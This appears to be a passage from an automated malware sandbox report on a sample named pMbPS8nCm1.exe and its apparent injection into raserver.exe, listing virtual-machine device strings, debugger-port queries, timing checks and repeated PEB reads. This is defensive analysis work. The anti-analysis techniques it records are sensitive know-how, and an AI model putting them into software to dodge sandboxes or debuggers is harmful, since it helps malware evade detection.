          Source: C:\Windows\SysWOW64\raserver.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\raserver.exeLast function: Thread delayed
          Source: explorer.exe, 00000003.00000000.283051381.000000000113D000.00000004.00000020.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}efb8b}
          Source: explorer.exe, 00000003.00000000.269510114.000000000891C000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.267438419.0000000008270000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: raserver.exe, 0000000D.00000002.509359980.000000000308F000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW+^
          Source: raserver.exe, 0000000D.00000002.509236536.0000000003062000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000003.00000000.283272252.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: explorer.exe, 00000003.00000000.269723701.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000003.00000000.261687193.00000000053C4000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000003.00000000.267438419.0000000008270000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000003.00000000.267438419.0000000008270000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000003.00000000.269723701.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: explorer.exe, 00000003.00000000.267438419.0000000008270000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\raserver.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 2_2_004088C0 rdtsc
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 2_2_00409B30 LdrLoadDll,
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 1_2_006E06DA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 1_2_006E08EE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 1_2_006E09DE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 1_2_006E099F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 1_2_006E0A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D28CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CEB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CEB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CEB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CEB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CEB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CEB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D114FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CD6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CD6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CD6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C59080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CD3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CD3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C6849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C990AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C8F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C8F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C8F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C8A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C70050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C70050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CEC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CEC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D12073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D21074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C7746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D24015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D24015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CD6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CD6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CD6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CD6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CD7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CD7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CD7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D2740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D2740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D2740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C8BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C8002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C8002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C8002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C8002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C8002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C6B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C6B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C6B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C6B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D08DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C5B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C5B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C5B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CE41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C6D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C6D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C7C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C8A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C52D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C52D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C52D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C52D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C52D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C8FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C8FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C82990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C861A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C861A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C835A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CD69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CD51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CD51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CD51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CD51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C81DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C81DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C81DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C7B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C7B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C93D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CD3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C77D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C5C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C7C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C7C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C5B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C5B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C59100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C59100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C59100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D28D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C74120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C74120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C74120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C74120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C74120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C8513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C8513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C84D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C84D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C84D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C5AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CDA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C82ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D28ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C836CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C98EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D0FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C676E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C816E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C82AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CEFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C8D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C8D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CD46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C6AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C6AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D20EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D20EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D20EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C8FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C59240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C59240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C59240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C59240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C67E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C67E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C67E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C67E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C67E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C67E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CE4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C6766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D0B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D0B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D28A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C9927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C7AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C7AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C7AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C7AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C7AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C5C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C5C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C5C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C88E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C68A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C5AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C5AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C8A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C8A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C73A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C5E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D0FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CD53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CD53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C937F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C61B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C61B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D0D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C68794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C8B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CD7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CD7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CD7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D1138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D25BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C5DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C6EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D28B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C5F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C5DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C6FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C83B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C83B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D28F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C8A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C8A70E mov eax, dword ptr fs:[00000030h]
